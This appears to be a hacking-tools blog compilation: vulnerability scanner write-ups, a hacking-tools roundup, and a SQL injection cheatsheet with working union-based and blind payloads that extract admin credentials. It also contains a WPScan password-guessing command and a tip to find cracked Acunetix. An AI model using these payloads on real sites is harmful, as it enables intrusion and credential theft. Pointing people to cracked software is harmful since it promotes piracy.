Console Web Vulnerability Scan Tools - Syhunt ScanTools

Syhunt released the new generation of its console-based scan tools, simply called ScanTools. The first release of ScanTools comes with four console applications: - ScanURL,ScanCode, ScanLog and ScanConf, incorporating the functionality of the scanners Syhunt Hybrid/Dynamic, Syhunt Code, Syhunt Insight and Syhunt Harden respectively. Whether you want to scan a live web application, source code files, web server logs or configuration files for vulnerabilities, weaknesses and more, ScanTools can help you start the task with a single line command. Syhunt ScanTools is available for download as a freeware portable package or as part of Syhunt Community.

Installation

Download Information

Syhunt ScanTools is included with the latest release of Syhunt. It is located in the installation directory of the suite.

Please note that the full-featured version of the tools is only available for registered users.

System Requirements

1. 512 MB of memory
2. 200 MB of free disk space
3. Internet connection (optional for remote scanning)
4. Windows XP, 2003, 2008, Vista, 7, 8 or 10.

Usage

Just run any of the Scan*.exe apps, which are located in the installation directory of Syhunt Hybrid, with no parameters to see usage instructions.

Supported Hunt Methods

For detailed information about scan methods, see the Hunt Methods page.

Scanning IPv6 addresses

Scanurl fully supports the scanning of IPv6 addresses. To scan an IPv6 target, enclose the address in square brackets, eg:

Scanurl http://[2001:4860:0:2001::68]

Black Box (Dynamic Scan)

1. Go to the directory Syhunt Hybrid is installed using the command prompt.
2. Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -gr

 Example:
 Scanurl http://www.somehost.com -hm:appscan -gr

White Box (Source Code Scan)

1. Go to the directory Syhunt is installed using the command prompt.
2. Example command-line:

 Scancode C:\WWW\Docs\ -gr

Gray Box (Dynamic + Code Scan)

1. Go to the directory Syhunt Hybrid is installed using the command prompt.
2. Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -srcdir:"[SourceDir]" -gr

 Example:
 Scanurl localhost -hm:appscan -srcdir:"C:\WWW\Docs\" -gr

Note: if you already entered the source code directory for the target host using the Syhunt Hybrid GUI in a past scan it is not necessary to assign it again using the -srcdir command.

Download  Syhunt ScanTools

Read More

Vulnerability Scanner - HellRaiser

HellRaiser Vulnerability Scanner

HellRaiser Vulnerability Scanner scans targets with nmap and then correlates cpe’s found with cve-search to enumerate vulnerabilities.
In order to test and run HellRaiser Vulnerability Scanner you need to install ruby, bundler and rails. https://gorails.com/setup/ubuntu/16.04

Install redis-server and nmap.

sudo apt-get update
sudo apt-get install redis-server nmap

Clone HellRaiser repository, change to hellraiser web app directory and run bundle install and bundle exec rake db:migrate.

git clone https://github.com/m0nad/HellRaiser/
cd HellRaiser/hellraiser/
bundle install
bundle exec rake db:migrate

Start

Start redis server.

redis-server

Go to the hellraiser web app directory and start sidekiq.

bundle exec sidekiq

Go to the hellraiser web app directory and start rails server.

rails s

Usage

Access http://127.0.0.1:3000

Download HellRaiser 

Read More

Full SQL Injections - Cheatsheet

[1]* -Introducing The SQL Injection Vuln:

SQL injection attacks are known also as SQL insertion
it's in the form of executing some querys in the database and getting acces to informations (SQL Vesion, Number & Names of tables and columns,some authentification infos,ect...)

[2]* -Exploiting Sql Injection Vuln :

Before proceeding to the exploitation of sql injections we have to checking for this vulnerability, so we have an exemple

http://www.website.com/articles.php?id=3

for checking the vulnerability we have to add ' (quote) to the url , lets see together

http://www.website.com/articles.php?id=3'

now, if we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

this website is vulnerable to sql injection, and if we don't get anything we can't exploiting this vulnerability.

Now, Lets go to exploiting this vuln and finding some informations about this sql database


certainly before doing anything we have to find the number of columns

[-] Finding the number of columns:

for finding the number of columns we use ORDER BY to order result in the database

lets see that ,

http://www.website.com/articles.php?id=3 order by 1/*

and if we havn't any error we try to change the number

http://www.website.com/articles.php?id=3 order by 2/*

still no error,so we continu to change the number

http://www.website.com/articles.php?id=3 order by 3/*

no error to

http://www.website.com/articles.php?id=3 order by 4/*

no error

http://www.website.com/articles.php?id=3 order by 5/*

yeah , here we have this error (Unknown column '5' in 'order clause')

so, this database has 4 colmuns because the error is in the 5

now, we try to check that UNION function work or not

[-] Checking UNION function :

for using UNION function we select more informations from the database in one statment

so we try this

http://www.website.com/articles.php?id=3 union all select 1,2,3,4/* (in the end it's 4 because we have see the number of columns it's 4)

now, if we see some numbers in the page like 1 or 2 or 3 or 4 == the UNION function work

if it not work we try to change the /* to --

so we have this

http://www.website.com/articles.php?id=3 union all select 1,2,3,4--

after checking the UNION function and it works good we try to get SQL version

[-] Getting SQL Version :

now we have a number in the screen after checking the UNION

we say in example that this number is 3

so we replace 3 with @@version or version()

http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*

and now we have the version in the screen!

lets go now to get tables and columns names


[-] Getting tables and columns names :

here we have a job to do!!

if the MySQL Version is < 5 (i.e 4.1.33, 4.1.12...)

lets see that the table admin exist!

http://www.website.com/articles.php?id=3 union all select 1,2,3,4,5 from admin/*

and here we see the number 3 that we had in the screen

now, we knows that the table admin exists

here we had to check column names:

http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*

if we get an error we have to try another column name

and if it work we get username displayed on screen (example: admin,moderator,super moderator...)

after that we can check if column password exists

we have this

http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*

and oups! we see password on the screen in a hash or a text

now we have to use 0x3a for having the informations like that username:password ,dmin:unhash...

http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*

this is the sample SQL Injection , now, we will go to the blind sql injection (more difficult)


[3]* -Exploiting Blind SQL Injection Vuln :

first we should check if website is vulnerable for example

http://www.website.com/articles.php?id=3

and to test the vulnerability we had to use

http://www.website.com/articles.php?id=3 and 1=1 ( we havn't any error and the page loads normally)

and now

http://www.website.com/articles.php?id=3 and 1=2

here we have some problems with text, picture and some centents ! and it's good! this website is vulnerable for Blind SQL Injection

we have to check MySQL Version

[-] Getting MySQL Version :

we use substring in blind injection to get MySQL Version

http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=4

we should replace the 4 with 5 if the version is 5

http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=5

and now if the function select do not work we should use subselect and we should testing if it work

[-] Testing if subselect works :

http://www.website.com/articles.php?id=3 and (select 1)=1 ( if the page load normaly the subselect works good)

and now we have to see if we have access to mysql.user

http://www.website.com/articles.php?id=3 and (select 1 from mysql.user limit 0,1)=1 (if it load normaly we have access to mysql.user)

now, we can checking table and column names

[-] Checking table and column names :

http://www.website.com/articles.php?id=3 and (select 1 from users limit 0,1)=1

if the page load normaly and no errors the table users exists

now we need column name

http://www.website.com/articles.php?id=3 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page load normaly and no errors the column password exists

now we have the table and the column , yeah, we can exploiting the vunlnerability now

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

the page load normaly and no errors,so we need to change the 80 for having an error

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90

no errors ! we continu

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

Yeah!! an error

the character is char(99). we use the ascii converter and we know that char(99) is letter 'c'

to test the second character we change ,1,1 to ,2,1

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

the page load normaly

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

the page loads normally, higher !!!

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

error ! lower number

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

Error That we search!!

now, we know that the second character is char(105) and that is 'i' with the ascii converter. We have 'ci' now from the first and the second charactets

our tutorial draws to the close!

Thanks you for reading and i hope that you have understand SQL Injection and exploitations of this vulnerability .

Source: www.exploit-db.com

By OffensiveSec

Read More

Finding WordPress Vulnerabilities - Using WPScan

When using WPScan you can scan your WordPress website for known vulnerabilities within the core version, plugins, and themes. You can also find out if any weak passwords, users, and security configuration issues are present. The database at wpvulndb.com is used to check for vulnerable software and the WPScan team maintains the ever-growing list of vulnerabilities.
This time we are going to dive into how to use WPScan with the most basic commands.

Updating WP Scan

You should always update WPScan to leverage the latest database before you scan your website for vulnerabilities.
Open Terminal and change your directory to the wpscan folder we downloaded in the first tutorial:

cd wpscan

From this directory we can run a command to pull the latest update from Github, and then another command to update the database.

git pull
ruby wpscan.rb --update

You will see the WPScan logo and a note that the the database update has completed successfully.

    WP Scan Database Update in Terminal

Scanning for Vulnerabilities

Next we are going to point the WPScan application at your WordPress website. With a few commands we can check your website for vulnerable themes, plugins, and users. This will let you know if your website has a high risk of becoming infected. From there you can take steps to secure your site by updating or disabling the security problems.
WPScan commands will always start with ruby wpscan.rb followed by your website URL.
ruby wpscan.rb --url http://yourwebsite.com
Running the basic command above will perform a quick scan of the website to identify your active theme and basic issues, such as exposed WordPress version numbers. You can also look for specific vulnerabilities by adding arguments to the end of this basic command.

Checking for Vulnerable Plugins

Adding the –enumerate vp argument checks the WordPress website for vulnerable plugins.

ruby wpscan.rb --url http://yourwebsite.com --enumerate vp

If vulnerable plugins are found you will see red exclamation icons and references to further information. Any vulnerable plugin should be replaced and removed if you cannot update it to patch the vulnerability.

Checking for Vulnerable Themes

Similarly, adding –enumerate vt to the command checks the WordPress website for vulnerable themes.

ruby wpscan.rb --url http://yourwebsite.com --enumerate vt

As with plugins, look for red exclamation icons and URLs with more information. Any vulnerable theme should be replaced and removed if you cannot update it to patch the vulnerability.

Checking User Enumeration

When hackers know your WordPress usernames it becomes easier for them to perform a successful brute force attack. If attackers gain access to one of your users with sufficient permissions, they can gain control of your WordPress installation.
To find out the login names of users on your WordPress website, we will use the argument –enumerate u at the end of the command.

ruby wpscan.rb --url http://yourwebsite.com --enumerate u

Ideally you should not be able to list the login names of your WordPress users.
If you have a Website Firewall or a plugin that stops WPScan, you may see an error like this:

WPScan stopped by CloudProxy WAF

It is always best to use a different nickname than the one used to login and some .htaccess solutions also exist for preventing user enumeration.

Password Guessing

Now we are going to try a number of passwords. If you have a list of passwords, WPScan can use the list to try logging in to each user account that it finds. This way you can see if any of your users are practicing poor password habits.
You can create or gather a wordlist, which is just a text file with passwords on each line. Hackers have huge collections of passwords but you can make a simple text document containing a decent number of top passwords. The file just needs to be placed in your wpscan directory so that the WPScan application can easily use it.
When you have the wordlist file in the WPScan directory, you can add the –wordlist argument along with the name of the wordlist file. You can also specify the number of threads to use at the same time to process the list. Depending on the length of the wordlist, it could take a lot of time or computer resources to complete.

ruby wpscan.rb --url http://yourwebsite.com --wordlist passwords.txt threads 50

Download WPScan

Read More

Auto Scanning to SSL Vulnerability - A2SV

                    █████╗ ██████╗ ███████╗██╗   ██╗
                   ██╔══██╗╚════██╗██╔════╝██║   ██║
                   ███████║ █████╔╝███████╗██║   ██║
    .o oOOOOOOOo   ██╔══██║██╔═══╝ ╚════██║╚██╗ ██╔╝        OOOo
    Ob.OOOOOOOo O  ██║  ██║███████╗███████║ ╚████╔╝   .adOOOOOOO
    OboO'''''''''' ╚═╝  ╚═╝╚══════╝╚══════╝  ╚═══╝  ''''''''''OO
    OOP.oOOOOOOOOOOO 'POOOOOOOOOOOo.   `'OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo'OOOOOOOOOOO` .adOOOOOOOOO'oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 ''OOOOOOOOOOOOOOOO'`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO'`  ''OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 'OOOO'       'YOoOOOOMOIONODOO'`  .   ''OOROAOPOEOOOoOY'     'OOO'
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP'%OOOOOOOOoOOOOOOO?oOOOOO?OOOO'OOo
                 '%o  OOOO'%OOOO%'%OOOOO'OOOOOO'OOO':
                      `$'  `OOOO' `O'Y ' `OOOO'  o             .
    .                  .     OP'          : o     .
                              :
                   [Auto Scanning to SSL Vulnerability]
                       [By Hahwul / www.hahwul.com]

1. A2SV?
Auto Scanning to SSL Vulnerability.
HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc

A. Support Vulnerability

[CVE-2014-0160] CCS Injection
[CVE-2014-0224] HeartBleed
[CVE-2014-3566] SSLv3 POODLE
[CVE-2015-0204] FREAK Attack
[CVE-2015-4000] LOGJAM Attack

B. Dev Plan

[DEV] DROWN Attack
[PLAN] SSL ACCF

2. How to Install?
A. Download(clone) & Unpack A2SV

git clone https://github.com/hahwul/a2sv.git
cd a2sv

B. Install Python Package / OpenSSL

pip install argparse
pip install netaddr

apt-get install openssl

C. Run A2SV

python a2sv.py -h

3. How to Use?

usage: a2sv.py [-h] [-t TARGET] [-p PORT] [-m MODULE] [-v]
optional arguments:
-h, --help            show this help message and exit
-t TARGET, --target TARGET
                      Target URL/IP Address
-p PORT, --port PORT  Custom Port / Default: 443
-m MODULE, --module MODULE
                      Check SSL Vuln with one module
                      [h]: HeartBleed
                      [c]: CCS Injection
                      [p]: SSLv3 POODLE
                      [f]: OpenSSL FREAK
                      [l]: OpenSSL LOGJAM
-u, --update          Update A2SV (GIT)
-v, --version         Show Version

[Scan SSL Vulnerability]

python a2sv.py -t 127.0.0.1
python a2sv.py -t 127.0.0.1 -m heartbleed
python a2sv.py -t 127.0.0.1 -p 8111

[Update A2SV]

python a2sv.py -u
python a2sv.py --update

4. Support
Contact hahwul@gmail.com


5. Screenshot

6. Code Reference Site

poodle : https://github.com/supersam654/Poodle-Checker
heartbleed : https://github.com/sensepost/heartbleed-poc
ccs injection : https://github.com/Tripwire/OpenSSL-CCS-Inject-Test
freak : https://gist.github.com/martinseener/d50473228719a9554e6a

Download A2SV

Read More

Vulnerability Scanner - HellRaiser

Install
Install ruby, bundler and rails. https://gorails.com/setup/ubuntu/16.04
Install redis-server and nmap.

sudo apt-get update
sudo apt-get install redis-server nmap

Clone HellRaiser repository, change to hellraiser web app directory and run bundle install.

git clone https://github.com/m0nad/HellRaiser/
cd HellRaiser/hellraiser/
bundle install

Start
Start redis server.

redis-server

Go to the hellraiser web app directory and start sidekiq.

bundle exec sidekiq

Go to the hellraiser web app directory and start rails server.

rails s

Usage
Access http://127.0.0.1:3000

How it works?
HellRaiser scan with nmap then correlates cpe's found with cve-search to enumerate vulnerabilities.

Download HellRaiser

Read More

Web Application XSS Scanner - XssPy

XssPy is a python tool for finding Cross Site Scripting vulnerabilities in websites. This tool is the first of its kind. Instead of just checking one page as most of the tools do, this tool traverses the website and find all the links and subdomains first. After that, it starts scanning each and every input on each and every page that it found while its traversal. It uses small yet effective payloads to search for XSS vulnerabilities.

The tool has been tested parallel with paid Vulnerability Scanners and most of the scanners failed to detect the vulnerabilities that the tool was able to find. Moreover, most paid tools scan only one site whereas XSSPY first finds a lot of subdomains and then scan all the links altogether. The tool comes with:

• Short Scanning
• Comprehensive Scanning
• Finding subdomains
• Checking every input on every page

With this tool, Cross Site Scripting vulnerabilities have been found in the websites of MIT, Stanford, Duke University, Informatica, Formassembly, ActiveCompaign, Volcanicpixels, Oxford, Motorola, Berkeley and many more.

Download XssPy

Read More

Black Box vBulletin Vulnerability Scanner Tool - OWASP VBScan 0.1.6

OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analyses them .

Why OWASP VBScan ?

If you want to do a penetration test on a vBulletin Forum, OWASP VBScan is Your best shot ever! This Project is being faster than ever and updated with the latest VBulletin vulnerabilities.

• Project Leader : Mohammad Reza Espargham
• Github : https://github.com/rezasp/vbscan/
• SourceForge : https://sourceforge.net/projects/vbscan/
• OWASP Page : https://www.owasp.org/index.php/OWASP_VBScan_Project

Usage :

perl vbscan.pl <target>
perl vbscan.pl http://target.com/vbulletin
perl vbscan.pl --help

Download OWASP VBScan

Read More

Automated Security Assessment Reporting Tool - Guinevere

This tool works with Gauntlet (a private tool) to automate assessment reporting.

Main features include:

• Generate Assessment Report
• Export Assessment
• Generate Retest Report
• Generate Pentest Checklist

Generate Assessment Report

This option will generate you .docx report based on the vulnerabilities identified during an assessment. The report will contain a bullet list of findings, the vulnerability report write-up, and a table of interesting hosts to include host names and ports. Each report write up automatically calculates the number of affected hosts and updates the report verbiage accordingly.

Export Assessment

An SQL dump of the assessment data from gauntlet will be export to a .sql file. This file can later be imported into by other analysts.

Generate Retest Report

A .docx retest report will be generated. The tool will evaluate the original assessment findings against the retest findings. The retest findings don't need to be ranked as only the severity level of a vulnerability found in the orginial assessment will be used. New vulnerabilities and new hosts found during the retest will also be ignored. The report will contain a list of vulnerabilities along with their status (Remediated, Partially Remediated, or Not Remediated). A table will also be provided that contains hosts that are still vulnerable. A statistics table is also provided to be used with building graphs or charts.

Generate Pentest Checklist - BETA

The Pentest Checklist is an HTML document used for information managment while conducting a pentest. The generated report provides the analyst with a list of host and their open ports along with space for note taking. This is stil under development and provides basic functionalty. The data is retrieved from the Gauntlet database. The "-T" flag can be used to display out from tools such as Nessus but is very verbose.

Usage

usage: Guinevere.py [-h] [-H DB_HOST] [-U DB_USER] [-P DB_PASS] [-p DB_PORT]
                    [-l LINES] [-A] [-V] [-sC] [-sH] [-sM] [-sL] [-sI] [-aD]
                    [-T]

optional arguments:
  -h, --help            show this help message and exit
  -H DB_HOST, --db-host DB_HOST
                        MySQL Database Host. Default set in script
  -U DB_USER, --db-user DB_USER
                        MySQL Database Username. Default set in script
  -P DB_PASS, --db-pass DB_PASS
                        MySQL Database Password. Default set in script
  -p DB_PORT, --db-port DB_PORT
                        MySQL Database Port. Default set in script
  -l LINES, --lines LINES
                        Number of lines to display when selecting an engagement. Default is 10
  -A, --all-vulns       Include all vulnerability headings when there are no associated report narratives
  -V, --all-verb        Include all vureto vulnerability verbiage when there are no associated report narratives
  -sC                   Exclude Critical-Severity Vulnerabilities
  -sH                   Exclude High-Severity Vulnerabilities
  -sM                   Exclude Medium-Severity Vulnerabilities
  -sL                   Include Low-Severity Vulnerabilities
  -sI                   Include Informational-Severity Vulnerabilities
  -aD, --assessment-date
                        Include the date when selecting an assessment to report on
  -T, --tool-output     Include Tool Output When Printing G-Checklist

Download Guinevere

Read More

Vulnerability Scanner With Custom Payload - PyScan-Scanner

REQUIRE

• urllib2
• BeautifulSoup
• requests

START

• Change database information

$bdd = new PDO('mysql:host=localhost;dbname=pyscan', 'user', 'password');

• Update a Python gate

panel_url = "http://localhost/pyscan/"
gate_scraper = "cmd/gate.php"
gate_scanner = "cmd/scan.php"
gate_vuln = "cmd/vuln.php"
gate_payload = "panel/api/payload.php"
gate_database = "panel/api/database.php"

Upload the .SQL

mysql -u username -p database_name < file.sql

Login

Username: root
password: toor

Make payload !

Test payload

python pyscan.py -u "http://exemple.com/id=2" -s -p PAYLOAD_ID

Test all payload

python pyscan.py -u "http://exemple.com/id=2" -s --all

Import mass link

Test all link

python pyscan.py --database

Download Pyscan-Scanner

Read More

Black Box vBulletin Vulnerability Scanner - VBScan 0.1.4

VBScan is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analyses them.

Why VBScan ?

If you want to do a penetration test on a vBulletin Forum, VBScan is Your best shot ever! This Project is being faster than ever and updated with the latest VBulletin vulnerabilities.

• Project Leader : Mohammad Reza Espargham
• Github : https://github.com/rezasp/vbscan/
• SourceForge : https://sourceforge.net/projects/vbscan/

usage :

./vbscan.pl <target>
./vbscan.pl http://target.com/vbulletin

VBScan 0.1.4 [Dennis Ritchie]

• Changed vulnerability scanner engine
• Changed default specified timeout to 180 seconds
• Added VBulletin 5.x RCE Exploit
• Added txt report output
• Fixed YUI 2.9.0 XSS false positive
• Fixed reported bugs

Download VBScan

Read More

Best Hacking Tools 2016 - Windows, Mac OS X, And Linux

Metasploit

Rather than calling Metasploit a collection of exploit tools, I’ll call it an infrastructure that you can utilize to build your own custom tools. This free tool is one of the most popular cybersecurity tool around that allows you to locate vulnerabilities at different platforms. Metasploit is backed by more than 200,000 users and contributors that help you to get insights and uncover the weaknesses in your system.

This top hacking tool package of 2016 lets you simulate real-world attacks to tell you about the weak points and finds them. As a penetration tester, it pin points the vulnerabilities with Nexpose closed–loop integration using Top Remediation reports. Using the open source Metasploit framework, users can build their own tools and take the best out of this multi-purpose hacking tool.


Metasploit is available for all major platforms including Windows, Linux, and OS X.

Download MetaSploit 

Acunetix WVS

Acunetix is a web vulnerability scanner (WVS) that scans and finds out the flaws in a website that could prove fatal. This multi-threaded tool crawls a website and finds out malicious Cross-site Scripting, SQL injection, and other vulnerabilities. This fast and easy to use tool scans WordPress websites form more than 1200 vulnerabilities in WordPress.

Acunetix comes with a Login Sequence Recorder that allows one to access the password protected areas of websites. The new AcuSensor technology used in this tool allows you to reduce the false positive rate. Such features have made Acunetix WVS a preferred hacking tools that you need to check out in 2016.


Acunetix is available for Windows XP and higher.

 Obs, Search in google to get full version software (cracked)

Download Acunetix WVS

Nmap

Nmap – also known as Network Mapper – falls in the category of a port scanner tool. This free and open source tool is the most popular port scanning tool around that allows efficient network discovery and security auditing. Used for a wide range of services, Nmap uses raw IP packets to determine the hosts available on a network, their services along with details, operating systems used by hosts, the type of firewall used, and other information.

Last year, Nmap won multiple security products of the year awards and was featured in multiple movies including The Matrix Reloaded, Die Hard 4, and others.  Available in the command line, Nmap executable also comes in an advanced GUI avatar.


Nmap is available for all major platforms including Windows, Linux, and OS X.

Download Nmap

Wireshark

Wireshark is a well-known packet crafting tool that discovers vulnerability within a network and probes firewall rule-sets. Used by thousands of security professionals to analyze networks and live pocket capturing and deep scanning of hundreds of protocols. Wireshark helps you to read live data from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others.

This free and open source tool was originally named Ethereal. Wireshark also comes in a command-line version called TShark.


This GTK+-based network protocol analyzer runs with ease on Linux, Windows, and OS X.

Download WireShark

oclHashcat

If password cracking is something you do on daily basis, you might be aware of the free password cracking tool Hashcat. While Hashcat is a CPU-based password cracking tool, oclHashcat is its advanced version that uses the power of your GPU.

oclHashcat calls itself world’s fastest password cracking tool with world’s first and only GPGPU based engine. For using the tool, NVIDIA users require ForceWare 346.59 or later and AMD users require Catalyst 15.7 or later.

This tool employs following attack modes for cracking:

ºStraight
ºCombination
ºBrute-force
ºHybrid dictionary + mask
ºHybrid mask + dictionary

Mentioning another major feature, oclHashcat is an open source tool under MIT license that allows an easy integration or packaging of the common Linux distros.


This useful hacking tool can be downloaded in different versions  for Linux, OSX, and Windows.

Download oclHashcat

Nessus Vulnerability Scanner

This top free hacking tool of 2016 works with the help of a client-server framework. Developed by Tenable Network Security, the tool is one of the most popular vulnerability scanners we have. Nessus serves different purposes to different types of users – Nessus Home, Nessus Professional, Nessus Manager and Nessus Cloud.

Using Nessus, one can scan multiple types of vulnerabilities that include remote access flaw detection, misconfiguration alert, denial of services against TCP/IP stack, preparation of PCI DSS audits, malware detection, sensitive data searches etc. To launch a dictionary attack, Nessus can also call a popular tool Hydra externally.

Apart from the above mentioned basic functionalities, Nessus could be used to scan multiple networks on IPv4, IPv6 and hybrid networks. You can set scheduled scan to run at your chosen time and re-scan all or a subsection of previously scanned hosts using selective host re-scanning.


Nessus is supported by a variety of platforms including Windows 7 and 8, Mac OS X, and popular Linux distros like Debian, Ubuntu, Kali Linux etc.

Download Nessus Vulnerability Scanner

Maltego

Maltego is an open source forensics platform that offers rigorous mining and information gathering to paint a picture of cyber threats around you. Maltego excels in showing the complexity and severity of points of failure in your infrastructure and the surrounding environment.

Maltego is a great hacker tool that analyzes the real world links between people, companies, websites, domains, DNS names, IP addresses, documents and whatnot. Based on Java, this tool runs in an easy-to-use graphical interface with lost customization options while scanning.


Maltego hacking tool  is available for Windows, Mac, and Linux.

Download Maltego

Social-Engineer Toolkit

Also featured on Mr. Robot, TrustedSec’s Social-Engineer Toolkit is an advanced framework for simulating multiple types of social engineering attacks like credential harvestings, phishing attacks, and more. On the show, Elliot is seen using the SMS spoofing tool from the Social-Engineer Toolkit.

This Python-driven tool is the standard tool for social-engineering penetration tests with more than two million downloads. It automates the attacks and generates disguising emails, malicious web pages and more.

To download SET on Linux, type the following command:

git clone https://github.com/trustedsec/social-engineer-toolkit/ set/


Apart from Linux, Social-Engineer Toolkit is partially supported on Mac OS X and Windows.



Other top hacking tools in multiple categories:

Web Vulnerability Scanners – Burp Suite, Firebug, AppScan, OWASP Zed, Paros Proxy

Vulnerability Exploitation Tools – Netsparker, sqlmap, Core Impact, WebGoat, BeEF

Forensic Tools – Helix3 Pro, EnCase, Autopsy

Port Scanners – Unicornscan, NetScanTools, Angry IP Scanner

Traffic Monitoring Tools – Nagios, Ntop, Splunk, Ngrep, Argus

Debuggers – IDA Pro, WinDbg, Immunity Debugger, GDB

Rootkit Detectors – DumpSec, Tripwire, HijackThis

Encryption Tools – KeePass, OpenSSL, OpenSSH/PuTTY/SSH, Tor

Password Crackers – John the Ripper, Aircrack, Hydra, ophcrack


By Offensive Sec

Read More